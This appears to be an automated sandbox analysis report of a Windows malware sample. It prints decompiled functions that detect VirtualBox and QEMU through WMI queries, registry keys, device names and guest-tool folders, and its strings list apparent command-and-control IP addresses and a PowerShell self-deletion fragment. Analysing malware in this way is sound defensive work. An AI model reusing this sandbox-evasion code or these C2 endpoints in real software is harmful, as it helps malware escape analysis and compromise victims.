                                        • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                                        • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                                        • API String ID: 1020912672-1865646205
                                        • Opcode ID: d8cd37143badf3434c6c21c4b3ccaeac9b5a595d6b550f084a82f7df2f32df9a
                                        • Instruction ID: e22cabbbd318ab7b172fb10e0d2fbe124d07ff45582128838a4f1d5dfddd418a
                                        • Opcode Fuzzy Hash: d8cd37143badf3434c6c21c4b3ccaeac9b5a595d6b550f084a82f7df2f32df9a
                                        • Instruction Fuzzy Hash: D7912336751A918AFB20CF65E854BDC33B1F788B88F40A512DE6A57B68DF38C649C311
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386E915A Relevance: 35.6, APIs: 10, Strings: 10, Instructions: 588COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitHandleInitializeProcess$AddressCloseCreateErrorEventLastModuleProcSecurityUninitialize_invalid_parameter_noinfo
                                        • String ID: " -Force$2104a$282.19.133.12:443,91.122.18.192:443,185.156.172.62:443,72.123.65.11:443,149.255.35.167:443,172.241.27.146:443$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$444$; Remove-Item -Path "$BLACK$powershell$response_status$tasks
                                        • API String ID: 2740944658-2167360499
                                        • Opcode ID: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction ID: ccb16deffa5ae09fd602d04ab6a24d45aa553ebd3a228bcb0c4fbe326df62b2e
                                        • Opcode Fuzzy Hash: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction Fuzzy Hash: B0529872280BC48AFB20DF64D944BDD23A1FB51758F50A616DBA90BAEADF74C784C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871F9C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 181memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 787 1c33871f9c0-1c33871f9ed call 1c3387211c0 790 1c33871fc43-1c33871fc4d 787->790 791 1c33871f9f3-1c33871fa33 call 1c3388445f8 * 2 787->791 796 1c33871fa35-1c33871fa38 791->796 797 1c33871fa8a-1c33871fa92 791->797 800 1c33871fa3a-1c33871fa56 796->800 801 1c33871fa81-1c33871fa84 SysFreeString 796->801 798 1c33871fa94-1c33871fa97 SysFreeString 797->798 799 1c33871fa9d-1c33871faaa 797->799 798->799 802 1c33871fc33-1c33871fc42 799->802 803 1c33871fab0-1c33871fabf 799->803 806 1c33871fa60-1c33871fa62 800->806 801->797 804 1c33871fac5-1c33871facf 803->804 805 1c33871fc13-1c33871fc2d CoUninitialize 803->805 808 1c33871fad0-1c33871fae3 804->808 805->802 806->801 807 1c33871fa64-1c33871fa7b CoUninitialize 806->807 807->801 811 1c33871fae9-1c33871faed 808->811 813 1c33871faf3-1c33871fb17 811->813 814 1c33871fc0f 811->814 818 1c33871fb19-1c33871fb21 813->818 819 1c33871fb48-1c33871fb6c 813->819 814->805 818->819 820 1c33871fb23-1c33871fb25 818->820 825 1c33871fb9d-1c33871fbc1 819->825 826 1c33871fb6e-1c33871fb76 819->826 821 1c33871fb27-1c33871fb3a call 1c33880e5b0 820->821 822 1c33871fb3e-1c33871fb42 VariantClear 820->822 821->822 822->819 832 1c33871fbc3-1c33871fbcb 825->832 833 1c33871fbf2-1c33871fbfe 825->833 826->825 828 1c33871fb78-1c33871fb7a 826->828 830 1c33871fb93-1c33871fb97 VariantClear 828->830 831 1c33871fb7c-1c33871fb8f call 1c33880e5b0 828->831 830->825 831->830 832->833 835 1c33871fbcd-1c33871fbcf 832->835 833->814 841 1c33871fc00-1c33871fc07 833->841 837 1c33871fbe8-1c33871fbec VariantClear 835->837 838 1c33871fbd1-1c33871fbe4 call 1c33880e5b0 835->838 837->833 838->837 841->808 843 1c33871fc0d 841->843 843->805
                                        C-Code - Quality: 21%
                                        			E000001C31C33871F9C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed int _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t71;
				void* _t72;
				signed char _t78;
				signed char _t81;
				signed char _t84;
				void* _t94;
				void* _t128;
				intOrPtr* _t137;
				long long _t167;
				void* _t180;
				long long _t185;

				_t167 = __rsi;
				r15d = 0;
				_a32 = _t185;
				_v88 = _t185;
				_a24 = _t185;
				_t72 = E000001C31C3387211C0(_t71,  &_a32,  &_v88, __rsi); // executed
				if (_t72 == 0) goto 0x3871fc43;
				_v32 = _t167;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x3871fa8a;
				if (__rax == 0) goto 0x3871fa81;
				_v96 =  &_a24;
				_t13 = _t185 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t185;
				_t179 =  *_a32;
				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0x3871fa81;
				r14d = r15d;
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x3871fa9d;
				__imp__#6();
				if (r14d == 0) goto 0x3871fc33;
				_t137 = _a24;
				_a16 = _t185;
				_a8 = r15d;
				if (_t137 == 0) goto 0x3871fc13;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t137 + 0x20))();
				if (_a8 == r15d) goto 0x3871fc0f;
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x3871fb48;
				_t78 = _v80 & 0x0000ffff;
				if (_t78 == r12w) goto 0x3871fb48;
				if ((_t78 & 0x00000008) == 0) goto 0x3871fb3e;
				E000001C31C33880E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x3871fb9d;
				_t81 = _v80 & 0x0000ffff;
				if (_t81 == r12w) goto 0x3871fb9d;
				if ((_t81 & 0x00000008) == 0) goto 0x3871fb93;
				E000001C31C33880E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0x3871fbf2;
				_t84 = _v80 & 0x0000ffff;
				if (_t84 == r12w) goto 0x3871fbf2;
				if ((_t84 & 0x00000008) == 0) goto 0x3871fbe8;
				E000001C31C33880E5B0(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a16 + 0x10))();
				if (_t94 != 0) goto 0x3871fc0f;
				if (_a24 != 0) goto 0x3871fad0;
				goto 0x3871fc13;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t94;
			}
























                                        0x1c33871f9c0
                                        0x1c33871f9cc
                                        0x1c33871f9d7
                                        0x1c33871f9db
                                        0x1c33871f9e2
                                        0x1c33871f9e6
                                        0x1c33871f9ed
                                        0x1c33871f9f3
                                        0x1c33871f9ff
                                        0x1c33871fa04
                                        0x1c33871fa09
                                        0x1c33871fa0e
                                        0x1c33871fa1e
                                        0x1c33871fa24
                                        0x1c33871fa2d
                                        0x1c33871fa33
                                        0x1c33871fa38
                                        0x1c33871fa42
                                        0x1c33871fa47
                                        0x1c33871fa47
                                        0x1c33871fa4e
                                        0x1c33871fa56
                                        0x1c33871fa62
                                        0x1c33871fa68
                                        0x1c33871fa6e
                                        0x1c33871fa78
                                        0x1c33871fa7b
                                        0x1c33871fa84
                                        0x1c33871fa92
                                        0x1c33871fa97
                                        0x1c33871faaa
                                        0x1c33871fab0
                                        0x1c33871fab4
                                        0x1c33871fab8
                                        0x1c33871fabf
                                        0x1c33871fac5
                                        0x1c33871fad7
                                        0x1c33871fae3
                                        0x1c33871fae6
                                        0x1c33871faed
                                        0x1c33871fafb
                                        0x1c33871fb07
                                        0x1c33871fb0a
                                        0x1c33871fb17
                                        0x1c33871fb19
                                        0x1c33871fb21
                                        0x1c33871fb25
                                        0x1c33871fb32
                                        0x1c33871fb3a
                                        0x1c33871fb42
                                        0x1c33871fb50
                                        0x1c33871fb5c
                                        0x1c33871fb5f
                                        0x1c33871fb6c
                                        0x1c33871fb6e
                                        0x1c33871fb76
                                        0x1c33871fb7a
                                        0x1c33871fb87
                                        0x1c33871fb8f
                                        0x1c33871fb97
                                        0x1c33871fba5
                                        0x1c33871fbb1
                                        0x1c33871fbb4
                                        0x1c33871fbc1
                                        0x1c33871fbc3
                                        0x1c33871fbcb
                                        0x1c33871fbcf
                                        0x1c33871fbdc
                                        0x1c33871fbe4
                                        0x1c33871fbec
                                        0x1c33871fbf9
                                        0x1c33871fbfe
                                        0x1c33871fc07
                                        0x1c33871fc0d
                                        0x1c33871fc16
                                        0x1c33871fc20
                                        0x1c33871fc2a
                                        0x1c33871fc2d
                                        0x1c33871fc42

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                                        • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                                        • API String ID: 2434920835-607120894
                                        • Opcode ID: 18a9160383bfad2217a0f6765ca1bb4c33e7fa5d24e15252037a2e59ca21f0ed
                                        • Instruction ID: 2e4baa18078e4cf99ad69895c0cd51a4175a2598fcc3c0dc4e51517979913f5b
                                        • Opcode Fuzzy Hash: 18a9160383bfad2217a0f6765ca1bb4c33e7fa5d24e15252037a2e59ca21f0ed
                                        • Instruction Fuzzy Hash: 6B815A76341B9086FB20DF25E854ADD37A1FB84B88F44A516EE6A47F58DF38C686C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871E2E0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 65registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 16%
                                        			E000001C31C33871E2E0(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed long long _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				long long _v600;
				long long _v608;
				long long _v616;
				char _v632;
				long long _v648;
				void* __rdi;
				long _t27;
				void* _t32;
				void* _t35;
				void* _t37;
				signed long long _t41;
				void* _t62;
				void* _t64;
				void* _t68;
				void* _t71;

				_a8 = __rbx;
				_a16 = __rsi;
				_t41 =  *0x38903000; // 0x9bfaf736ae76
				_v24 = _t41 ^ _t68 - 0x000002a0;
				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E000001C31C33880E410(_t32, 0, _t35, _t37,  &_v536, _t62, _t64, _t71);
				0x3871e130();
				_v632 = __rsi;
				r9d = 0x20019;
				_v648 =  &_v632;
				r8d = 0;
				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t27 == 0) goto 0x3871e3ef;
				if (__rbx + 1 - 9 < 0) goto 0x3871e380;
				goto 0x3871e3ff;
				RegCloseKey(??);
				E000001C31C33880C290();
				return 1;
			}



























                                        0x1c33871e2e0
                                        0x1c33871e2e5
                                        0x1c33871e2f2
                                        0x1c33871e2fc
                                        0x1c33871e30d
                                        0x1c33871e31b
                                        0x1c33871e327
                                        0x1c33871e333
                                        0x1c33871e33f
                                        0x1c33871e34b
                                        0x1c33871e357
                                        0x1c33871e363
                                        0x1c33871e36f
                                        0x1c33871e377
                                        0x1c33871e38a
                                        0x1c33871e390
                                        0x1c33871e3b1
                                        0x1c33871e3bb
                                        0x1c33871e3c0
                                        0x1c33871e3c6
                                        0x1c33871e3cb
                                        0x1c33871e3d8
                                        0x1c33871e3e0
                                        0x1c33871e3e9
                                        0x1c33871e3ed
                                        0x1c33871e3f4
                                        0x1c33871e40a
                                        0x1c33871e423

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                                        • API String ID: 47109696-1723177289
                                        • Opcode ID: 7c38387bba371d1f9531227918788e45451f020520461cd3ce23ee421c54f2a7
                                        • Instruction ID: 0d31c83bba7c667b62dc84805a046794932fbc0237bf8b80c622e43f15417f9e
                                        • Opcode Fuzzy Hash: 7c38387bba371d1f9531227918788e45451f020520461cd3ce23ee421c54f2a7
                                        • Instruction Fuzzy Hash: 26311736255BC096FA519B15F484BCAB3A8F788780F50A227DEAD47B68DF38C254CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386E9070 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140sleepsynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1179 1c3386e9070 1180 1c3386e9070 call 1c338811c60 1179->1180 1181 1c3386e9075-1c3386e90aa Sleep SleepEx 1180->1181 1181->1179 1182 1c3386e90ac-1c3386e9122 ExitProcess 1181->1182 1183 1c3386e912d-1c3386e9135 1182->1183 1184 1c3386e9151 call 1c33871dc50 1183->1184
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ExitObjectProcessSingleWait
                                        • String ID: 2104a$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$BLACK
                                        • API String ID: 620895886-100088877
                                        • Opcode ID: af6207a73a3482f1afac7967fe309dd331fc75ebf2ebde154b395dcd4d382960
                                        • Instruction ID: 3c15c5d3f6a131b63c7aa63e49fe743f473246f214bf31d8dedf4c7ed7549599
                                        • Opcode Fuzzy Hash: af6207a73a3482f1afac7967fe309dd331fc75ebf2ebde154b395dcd4d382960
                                        • Instruction Fuzzy Hash: 78517E72251BC08AF7749F34A855BDA36A5FB41728F40A71ADAB50AEE5CF38C354C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3387211C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Initialize$CreateInstanceSecurityUninitialize
                                        • String ID: ROOT\CIMV2
                                        • API String ID: 374467530-2786109267
                                        • Opcode ID: cde58bd1f11807151f71f409ee3618f128b570f62afd7fce95148d0cbc5f49ce
                                        • Instruction ID: 93ab2bd4cd7822afec204f089e1dbd29b8c3dba6a7bef2ca4579b2ffceaa9a1b
                                        • Opcode Fuzzy Hash: cde58bd1f11807151f71f409ee3618f128b570f62afd7fce95148d0cbc5f49ce
                                        • Instruction Fuzzy Hash: 09417132748B8486F750CF25F444B8E77A1F788B84F149116EEAA87B58DF38D295CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871FE00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E000001C31C33871FE00(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed long long _v24;
				char _v536;
				void* _v1064;
				char _v1592;
				long long _v1608;
				long long _v1616;
				intOrPtr _v1624;
				void* __rdi;
				signed char _t29;
				void* _t31;
				void* _t38;
				void* _t41;
				signed long long _t48;
				void* _t63;
				void* _t68;
				void* _t75;
				void* _t78;
				void* _t81;

				_t81 = __r9;
				_a16 = __rbp;
				_a24 = __rsi;
				_t48 =  *0x38903000; // 0x9bfaf736ae76
				_v24 = _t48 ^ _t75 - 0x00000670;
				r8d = 0x208;
				E000001C31C33880E410(_t31, 0, _t38, _t41,  &_v1592, _t63, _t68, _t78);
				_a8 = __rbx;
				_v1616 = L"qemu-ga";
				_v1608 = L"SPICE Guest Tools";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E000001C31C33880E410(_t31, 0, 0, _t41,  &_v536, _t63, _t68, _t78);
				_v1624 = 0;
				if ( *0x38904490 == 8) goto 0x3871ff49;
				if (1 - 0x1e < 0) goto 0x3871fe91;
				r9d = 0;
				_t11 = _t81 + 0x26; // 0x26
				r8d = _t11;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				0x3871e130();
				_t29 = GetFileAttributesW(??); // executed
				if (_t29 == 0xffffffff) goto 0x3871ff0d;
				if ((_t29 & 0x00000010) != 0) goto 0x3871ffc8;
				if (_t68 + 1 - 2 < 0) goto 0x3871fe70;
				E000001C31C33880C290();
				return 0;
			}






















                                        0x1c33871fe00
                                        0x1c33871fe00
                                        0x1c33871fe05
                                        0x1c33871fe12
                                        0x1c33871fe1c
                                        0x1c33871fe2b
                                        0x1c33871fe31
                                        0x1c33871fe3d
                                        0x1c33871fe45
                                        0x1c33871fe5a
                                        0x1c33871fe65
                                        0x1c33871fe7a
                                        0x1c33871fe80
                                        0x1c33871fe87
                                        0x1c33871fe94
                                        0x1c33871fea6
                                        0x1c33871fea8
                                        0x1c33871feb5
                                        0x1c33871feb5
                                        0x1c33871feb9
                                        0x1c33871fed1
                                        0x1c33871fef0
                                        0x1c33871fefa
                                        0x1c33871ff03
                                        0x1c33871ff07
                                        0x1c33871ff14
                                        0x1c33871ff2f
                                        0x1c33871ff48

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                                        • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                                        • API String ID: 3908115579-2146621234
                                        • Opcode ID: cddd45ac548655ee25877be52d59947d54e96f6af9043e306f26cc9488fc13fa
                                        • Instruction ID: a31dbf37bbcf62ae5865b7c30ff4d97f7d6d2b0618017dee376fcec2a956a2b0
                                        • Opcode Fuzzy Hash: cddd45ac548655ee25877be52d59947d54e96f6af9043e306f26cc9488fc13fa
                                        • Instruction Fuzzy Hash: 4D41A572264AC486FB208F14E448BDE7366F789B84F849227DA6D47B65CF38C746C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720FD0 Relevance: 15.1, APIs: 10, Instructions: 74memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AdaptersAllocFreeInfo
                                        • String ID:
                                        • API String ID: 2824440793-0
                                        • Opcode ID: cb8fe06dabd72fa1b03e3663e6c92b7a4a3ca4949d70821c1c2e72601d651c16
                                        • Instruction ID: e227301c80fc19c5c00fb1acb7cd65fc5f850e973b945a561226444b96e75910
                                        • Opcode Fuzzy Hash: cb8fe06dabd72fa1b03e3663e6c92b7a4a3ca4949d70821c1c2e72601d651c16
                                        • Instruction Fuzzy Hash: 8C31E83264ABD082FB648B16B4146A967A1F789B90F08E036DF6907755EE3CD7C0C712
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871E7D0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 60fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                                        • API String ID: 3498533004-4225997269
                                        • Opcode ID: 56ed62d2cf7a837129290d8eac05861c9cde84ab61e432c1682e0b6220b0c953
                                        • Instruction ID: 195f076d97145139774eb9caf0bc3c4cffe45ae9187aac134c885dd46fb22919
                                        • Opcode Fuzzy Hash: 56ed62d2cf7a837129290d8eac05861c9cde84ab61e432c1682e0b6220b0c953
                                        • Instruction Fuzzy Hash: B8217136258B8086FB508F14F4447CA73A4F388790F90A626DEBC07BA4DF38C645CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3387210E0 Relevance: 12.1, APIs: 8, Instructions: 57processCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3656348920-0
                                        • Opcode ID: 9c1d27ace35d54a340b9e4870039b04d238f8d5043f3ec788ee57e3bdf85d9d7
                                        • Instruction ID: 8446b75bf015cc34b5c18c6ce04c7453e3120fc34ae4d7c63aa0d6323533ea87
                                        • Opcode Fuzzy Hash: 9c1d27ace35d54a340b9e4870039b04d238f8d5043f3ec788ee57e3bdf85d9d7
                                        • Instruction Fuzzy Hash: 422145323456C082FB60CB25F858BAA63A2F788BD4F459622D9794B694EF3CD744C711
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871DCE2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E000001C31C33871DCE2(signed int __edi, signed int __ebp, long long __rax, void* _a32, void* _a48, void* _a56, void* _a64) {
				_Unknown_base(*)()* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				signed int _t90;
				signed int _t99;
				signed int _t159;
				signed int _t161;
				signed int _t167;
				void* _t191;
				long long _t192;
				_Unknown_base(*)()* _t193;
				void* _t197;
				void* _t212;
				void* _t213;
				void* _t218;
				void* _t221;
				void* _t223;
				void* _t224;
				void* _t225;
				long long _t229;
				signed int _t230;
				signed long long _t239;
				long long _t241;
				long long _t243;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;

				_t229 = __rax;
				_t161 = __edi;
				goto 0x3871dcfe;
				_t57 = GetProcAddress(??, ??);
				_t192 = __rax;
				0x38720190(); // executed
				_t193 = _t57;
				sil = _t193 == 0;
				if (_t193 == 0) goto 0x3871df24; // executed
				_t58 = E000001C31C33871E190(_t159, _t230, _t239, _t241); // executed
				_t59 = E000001C31C33871E2E0(_t230, _t241); // executed
				_t99 = (__edi & 0xffffff00 | _t58 == 0x00000000) & __edi & ((__edi & 0xffffff00 | _t192 != 0x00000000) ^ 0x00000001) & __ebp & (__edi & 0xffffff00 | _t59 == 0x00000000); // executed
				_t60 = E000001C31C33871E430(_t230, _t239, _t241); // executed
				_t61 = E000001C31C33871E6A0(_t247); // executed
				_t197 = _t61;
				bpl = _t197 == 0;
				if (_t197 == 0) goto 0x3871df24;
				_t62 = E000001C31C338720FD0(_t229, _t230, 0x388b7ff8, _t241); // executed
				sil = _t62 == 0;
				_t63 = E000001C31C33871E7D0(_t230, _t241, _t243, _t247); // executed
				_t167 = _t161 & _t161 & _t99 & (_t161 & 0xffffff00 | _t60 == 0x00000000) & (_t161 & 0xffffff00 | _t63 == 0x00000000);
				FindWindowW(??, ??); // executed
				_t231 = _t229; // executed
				FindWindowW(??, ??); // executed
				if (_t229 != 0) goto 0x3871dda8;
				if (_t229 == 0) goto 0x3871ddad;
				_t66 = E000001C31C33871E8F0(); // executed
				_t67 = E000001C31C33871E990(_t231); // executed
				_t68 = E000001C31C33871EA40(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t69 = E000001C31C33871EC20(0, _t231, _t239, _t241, _t249); // executed
				0x3871ef30();
				_t70 = E000001C31C33871EFD0(_t69, _t229);
				_t71 = E000001C31C33871F520(0, _t229, _t231, _t241, _t249, _t250); // executed
				_t72 = E000001C31C33871F730(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t73 = E000001C31C33871F120(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t74 = E000001C31C33871F300(0, _t229, _t231, _t241, _t249); // executed
				_t75 = E000001C31C33871F9C0(0, _t229, _t239, _t241, _t248, _t249); // executed
				_t212 = _t75;
				if (_t212 == 0) goto 0x3871df24; // executed
				_t76 = E000001C31C338720C70(_t231); // executed
				_t213 = _t76;
				sil = _t213 == 0;
				if (_t213 == 0) goto 0x3871df24; // executed
				_t77 = E000001C31C33871FC50(_t231, _t241); // executed
				_t78 = E000001C31C33871FD40(_t231); // executed
				_t79 = E000001C31C33871FE00(_t231, _t241, _t243, _t247); // executed
				_t80 = E000001C31C338720070(_t161, _t191, _t229);
				_t218 = E000001C31C33871FFE0(_t229, _t231, _t241);
				sil = _t218 == 0;
				if (_t218 == 0) goto 0x3871df24;
				_t82 = E000001C31C338720250(_t231, _t241);
				_t83 = E000001C31C338720370(_t231, _t239, _t241); // executed
				_t84 = E000001C31C338720590(_t247); // executed
				_t221 = _t84;
				sil = _t221 == 0;
				if (_t221 == 0) goto 0x3871df24; // executed
				_t85 = E000001C31C338720BC0(_t231); // executed
				_t86 = E000001C31C338720FD0(_t229, _t231, 0x388b8f18, _t241); // executed
				_t223 = _t86;
				sil = _t223 == 0;
				if (_t223 == 0) goto 0x3871df24; // executed
				_t87 = E000001C31C3387209C0(0, _t229, _t239, _t241, _t249); // executed
				_t224 = _t87;
				if (_t224 == 0) goto 0x3871df24; // executed
				_t88 = E000001C31C338720770(); // executed
				_t225 = _t88;
				sil = _t225 == 0;
